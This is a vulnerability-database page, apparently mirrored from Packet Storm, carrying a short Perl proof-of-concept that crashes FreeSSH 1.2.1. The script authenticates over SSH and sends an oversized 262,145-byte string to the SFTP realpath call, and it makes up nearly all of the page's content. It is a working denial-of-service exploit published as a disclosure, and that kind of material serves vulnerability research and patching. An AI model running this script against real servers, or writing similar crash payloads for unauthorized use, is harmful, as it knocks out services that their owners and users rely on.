Lucene search

K

fsshatter2.txt

๐Ÿ—“๏ธย 22 Oct 2008ย 00:00:00Reported byย Jeremy BrownTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 19ย Views

FreeSSH 1.2.1 Crash due to Fuzzin

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/perl  
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]  
# FreeSSH 1.2.1 Crash #2 -- A Product of Fuzzing. Stay Tuned For More.  
use Net::SSH2;  
  
$host = "192.168.0.100";  
$port = 22;  
$username = "test";  
$password = "test";  
$dos = "A" x 262145;  
  
$ssh2 = Net::SSH2->new();  
$ssh2->connect($host, $port) || die "\nError: Connection Refused!\n";  
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";  
$sftp = $ssh2->sftp();  
$realpath = $sftp->realpath($dos);  
$ssh2->disconnect();  
exit;  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
22 Oct 2008 00:00Current
0.1Low risk
Vulners AI Score0.1
19
.json
Report